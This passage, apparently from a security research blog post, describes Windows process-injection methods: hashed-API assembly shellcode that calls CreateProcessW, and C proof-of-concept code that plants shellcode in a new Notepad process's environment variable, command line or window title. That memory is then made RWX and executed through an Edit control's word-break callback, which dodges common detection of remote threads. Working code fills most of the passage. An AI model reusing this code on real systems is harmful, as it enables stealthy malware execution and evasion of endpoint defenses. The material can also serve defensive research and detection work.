          mov    ecx, [rbx+rsi+IMAGE_NT_HEADERS.OptionalHeader + \
                               IMAGE_OPTIONAL_HEADER.DataDirectory + \
                               IMAGE_DIRECTORY_ENTRY_EXPORT * IMAGE_DATA_DIRECTORY_size + \
                               IMAGE_DATA_DIRECTORY.VirtualAddress - \
                               TEB.ProcessEnvironmentBlock]
          jecxz  next_dll              ; if no exports, try next DLL in list
          ; rsi = offset IMAGE_EXPORT_DIRECTORY.Name 
          lea    rsi, [rbx+rcx+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
          lodsd                        ; eax = NumberOfNames
          xchg   eax, ecx
          jecxz  next_dll              ; if no names, try next DLL in list
          
          ; r8 = IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
          lodsd
          xchg   eax, r8d              ;
          add    r8, rbx               ; r8 = RVA2VA(r8, rbx)
          ; ebp = IMAGE_EXPORT_DIRECTORY.AddressOfNames
          lodsd
          xchg   eax, ebp              ;
          add    rbp, rbx              ; rbp = RVA2VA(rbp, rbx)
          ; r9 = IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals      
          lodsd
          xchg   eax, r9d
          add    r9, rbx               ; r9 = RVA2VA(r9, rbx)
    find_api:
          mov    esi, [rbp+rcx*4-4]    ; rax = AddressOfNames[rcx-1]
          add    rsi, rbx
          xor    eax, eax
          cdq
    hash_api:
          lodsb
          add    edx, eax
          ror    edx, 8
          dec    al
          jns    hash_api
          cmp    edx, 0x1b929a47       ; CreateProcessW
          loopne find_api              ; loop until found or no names left
          
          jnz    next_dll              ; not found? goto next_dll
          
          movzx  eax, word[r9+rcx*2]   ; eax = AddressOfNameOrdinals[rcx]
          mov    eax, [r8+rax*4]
          add    rbx, rax              ; rbx += AddressOfFunctions[rdx]
          
          ; CreateProcess(NULL, cmd, NULL, NULL, 
          ;   FALSE, 0, NULL, &si, &pi);
          pop    rdx           ; lpCommandLine = buffer for Edit
          xor    r8, r8        ; lpProcessAttributes = NULL
          xor    r9, r9        ; lpThreadAttributes = NULL
          xor    eax, eax
          mov    [rsp+stk_mem.bInheritHandles     ], rax ; bInheritHandles      = FALSE
          mov    [rsp+stk_mem.dwCreationFlags     ], rax ; dwCreationFlags      = 0
          mov    [rsp+stk_mem.lpEnvironment       ], rax ; lpEnvironment        = NULL
          mov    [rsp+stk_mem.lpCurrentDirectory  ], rax ; lpCurrentDirectory   = NULL
          
          lea    rdi, [rsp+stk_mem.procinfo       ]
          mov    [rsp+stk_mem.lpProcessInformation], rdi ; lpProcessInformation = &pi
    
          lea    rdi, [rsp+stk_mem.startupinfo    ]
          mov    [rsp+stk_mem.lpStartupInfo       ], rdi ; lpStartupInfo        = &si
          
          xor    ecx, ecx
          push   STARTUPINFO_size
          pop    rax
          stosd                         ; si.cb = sizeof(STARTUPINFO)
          sub    rax, 4
          xchg   eax, ecx
          rep    stosb
          call   rbx
          
          ; deallocate stack
          xor    eax, eax
          mov    al, stk_size
          add    rsp, rax
          xor    eax, eax
          
          ; restore non-volatile registers
          popx   rsi, rbx, rdi, rbp  
          ret
    

    3. Environment Variables

    Part of Unix since 1979 and MS-DOS/Windows since 1982. According to MSDN, the maximum size of a user-defined variable is 32,767 characters. 32KB should be sufficient for most shellcode, but if not, you have the option of using multiple variables for anything else.

    There’s a few ways to inject using variables, but I found the easiest approach to be setting one in the current process with SetEnvironmentVariable, and then allowing CreateProcessW to transfer or propagate all of them to the new process by setting the lpEnvironment parameter to NULL.

        // generate random name
        srand(time(0));
        for(i=0; i<MAX_NAME_LEN; i++) {
          name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
        }
        
        // set variable in this process space with our shellcode
        SetEnvironmentVariable(name, (PWCHAR)WINEXEC);
        
        // create a new process using 
        // environment variables from this process
        ZeroMemory(&si, sizeof(si));
        si.cb          = sizeof(si);
        si.dwFlags     = STARTF_USESHOWWINDOW;
        si.wShowWindow = SW_SHOWDEFAULT;
        
        CreateProcess(NULL, L"notepad", NULL, NULL, 
          FALSE, 0, NULL, NULL, &si, &pi);
    

    Variable names are stored in memory alphabetically and will appear in the same order for the new process so long as lpEnvironment for CreateProcess is set to NULL. The PoC here will locate the address of the shellcode inside the current environment block, then subtract the base address to obtain the relative virtual address (RVA).

    // return relative virtual address of environment block
    DWORD get_var_rva(PWCHAR name) {
        PVOID  env;
        PWCHAR str, var;
        DWORD  rva = 0;
        
        // find the offset of value for environment variable
        env = NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters->Environment;
        str = (PWCHAR)env;
        
        while(*str != 0) {
          // our name?
          if(wcsncmp(str, name, MAX_NAME_LEN) == 0) {
            var = wcsstr(str, L"=") + 1;
            // calculate RVA of value
            rva = (PBYTE)var - (PBYTE)env;
            break;
          }
          // advance to next entry
          str += wcslen(str) + 1;
        }
        return rva;
    }
    

    Once we have the RVA for local process, read the address of environment block in remote process and add the RVA.

    // get the address of environment block
    PVOID var_get_env(HANDLE hp, PDWORD envlen) {
        NTSTATUS                    nts;
        PROCESS_BASIC_INFORMATION   pbi;
        RTL_USER_PROCESS_PARAMETERS upp;
        PEB                         peb;
        ULONG                       len;
        SIZE_T                      rd;
    
        // get the address of PEB
        nts = NtQueryInformationProcess(
            hp, ProcessBasicInformation,
            &pbi, sizeof(pbi), &len);
        
        // get the address RTL_USER_PROCESS_PARAMETERS
        ReadProcessMemory(
          hp, pbi.PebBaseAddress,
          &peb, sizeof(PEB), &rd);
        
        // get the address of Environment block 
        ReadProcessMemory(
          hp, peb.ProcessParameters,
          &upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd);
    
        *envlen = upp.EnvironmentSize;
        return upp.Environment;
    }
    

    The full routine will copy the user-supplied command to the Edit control and the shellcode will receive this when the word break callback is executed. You don’t need to use Notepad, but I just wanted to avoid the usual methods of executing code via RtlCreateUserThread or CreateRemoteThread. Figure 1 shows the shellcode stored as an environment variable. See var_inject.c for more detals.

    Figure 1. Environment variable of new process containing shellcode.

    void var_inject(PWCHAR cmd) {
        STARTUPINFO         si;
        PROCESS_INFORMATION pi;
        WCHAR               name[MAX_PATH]={0};    
        INT                 i; 
        PVOID               va;
        DWORD               rva, old, len;
        PVOID               env;
        HWND                npw, ecw;
    
        // generate random name
        srand(time(0));
        for(i=0; i<MAX_NAME_LEN; i++) {
          name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
        }
        
        // set variable in this process space with our shellcode
        SetEnvironmentVariable(name, (PWCHAR)WINEXEC);
        
        // create a new process using 
        // environment variables from this process
        ZeroMemory(&si, sizeof(si));
        si.cb          = sizeof(si);
        si.dwFlags     = STARTF_USESHOWWINDOW;
        si.wShowWindow = SW_SHOWDEFAULT;
        
        CreateProcess(NULL, L"notepad", NULL, NULL, 
          FALSE, 0, NULL, NULL, &si, &pi);
         
        // wait for process to initialize
        // if you don't wait, there can be a race condition
        // reading the correct Environment address from new process    
        WaitForInputIdle(pi.hProcess, INFINITE);
        
        // the command to execute is just pasted into the notepad
        // edit control.
        npw = FindWindow(L"Notepad", NULL);
        ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
        SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);
        
        // get the address of environment block in new process
        // then calculate the address of shellcode
        env = var_get_env(pi.hProcess, &len);
        va = (PBYTE)env + get_var_rva(name);
    
        // set environment block to RWX
        VirtualProtectEx(pi.hProcess, env, 
          len, PAGE_EXECUTE_READWRITE, &old);
    
        // execute shellcode
        SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)va);
        SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
        SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
        
    cleanup:
        // cleanup and exit
        SetEnvironmentVariable(name, NULL);
        
        if(pi.hProcess != NULL) {
          CloseHandle(pi.hThread);
          CloseHandle(pi.hProcess);
        }
    }
    

    4. Command Line

    This can be easier to work with than environment variables. For this example, only the shellcode itself is used and that can be located easily in the PEB.

        #define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"
    
        ExpandEnvironmentStrings(NOTEPAD_PATH, path, MAX_PATH);
        
        // create a new process using shellcode as command line
        ZeroMemory(&si, sizeof(si));
        si.cb          = sizeof(si);
        si.dwFlags     = STARTF_USESHOWWINDOW;
        si.wShowWindow = SW_SHOWDEFAULT;
        
        CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL, 
          FALSE, 0, NULL, NULL, &si, &pi);
    

    Reading is much the same as reading environment variables since they both reside inside RTL_USER_PROCESS_PARAMETERS.

    // get the address of command line
    PVOID get_cmdline(HANDLE hp, PDWORD cmdlen) {
        NTSTATUS                    nts;
        PROCESS_BASIC_INFORMATION   pbi;
        RTL_USER_PROCESS_PARAMETERS upp;
        PEB                         peb;
        ULONG                       len;
        SIZE_T                      rd;
    
        // get the address of PEB
        nts = NtQueryInformationProcess(
            hp, ProcessBasicInformation,
            &pbi, sizeof(pbi), &len);
        
        // get the address RTL_USER_PROCESS_PARAMETERS
        ReadProcessMemory(
          hp, pbi.PebBaseAddress,
          &peb, sizeof(PEB), &rd);
        
        // get the address of command line 
        ReadProcessMemory(
          hp, peb.ProcessParameters,
          &upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd);
    
        *cmdlen = upp.CommandLine.Length;
        return upp.CommandLine.Buffer;
    }
    

    Figure 2 illustrates what Process Explorer might show for the new process. See cmd_inject.c for more detals.

    Figure 2. Command line of new process containing shellcode.

    #define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"
    
    void cmd_inject(PWCHAR cmd) {
        STARTUPINFO         si;
        PROCESS_INFORMATION pi;
        WCHAR               path[MAX_PATH]={0};
        DWORD               rva, old, len;
        PVOID               cmdline;
        HWND                npw, ecw;
    
        ExpandEnvironmentStrings(NOTEPAD_PATH, path, MAX_PATH);
        
        // create a new process using shellcode as command line
        ZeroMemory(&si, sizeof(si));
        si.cb          = sizeof(si);
        si.dwFlags     = STARTF_USESHOWWINDOW;
        si.wShowWindow = SW_SHOWDEFAULT;
        
        CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL, 
          FALSE, 0, NULL, NULL, &si, &pi);
         
        // wait for process to initialize
        // if you don't wait, there can be a race condition
        // reading the correct command line from new process  
        WaitForInputIdle(pi.hProcess, INFINITE);
        
        // the command to execute is just pasted into the notepad
        // edit control.
        npw = FindWindow(L"Notepad", NULL);
        ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
        SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);
        
        // get the address of command line in new process
        // which contains our shellcode
        cmdline = get_cmdline(pi.hProcess, &len);
        
        // set the address to RWX
        VirtualProtectEx(pi.hProcess, cmdline, 
          len, PAGE_EXECUTE_READWRITE, &old);
        
        // execute shellcode
        SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)cmdline);
        SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
        SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
        
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
    

    5. Window Title

    IMHO, this is the best of three because the lpTitle field of STARTUPINFO only applies to console processes. If a GUI like notepad is selected, process explorer doesn’t show any unusual characters for various properties. Set lpTitle to the shellcode and CreateProcessW will inject. As with the other two methods, obtaining the address can be read via the PEB.

        // create a new process using shellcode as window title
        ZeroMemory(&si, sizeof(si));
        si.cb          = sizeof(si);
        si.dwFlags     = STARTF_USESHOWWINDOW;
        si.wShowWindow = SW_SHOWDEFAULT;
        si.lpTitle     = (PWCHAR)WINEXEC;
    

    6. Runtime Data

    Two fields (cbReserved2 and lpReserved2) in the STARTUPINFO structure are, according to Microsoft, “Reserved for use by the C Run-time” and must be NULL or zero prior to calling CreateProcess. The maximum amount of data that can be transferred into a new process is 65,536 bytes, but my experiment with it resulted in the new process failing to execute. The fault was in ucrtbase.dll likely because lpReserved2 didn’t point to the data it expected.

    While it didn’t work for me, that’s not to say it can’t work with some additional tweaking. Sources

    ❌
    ❌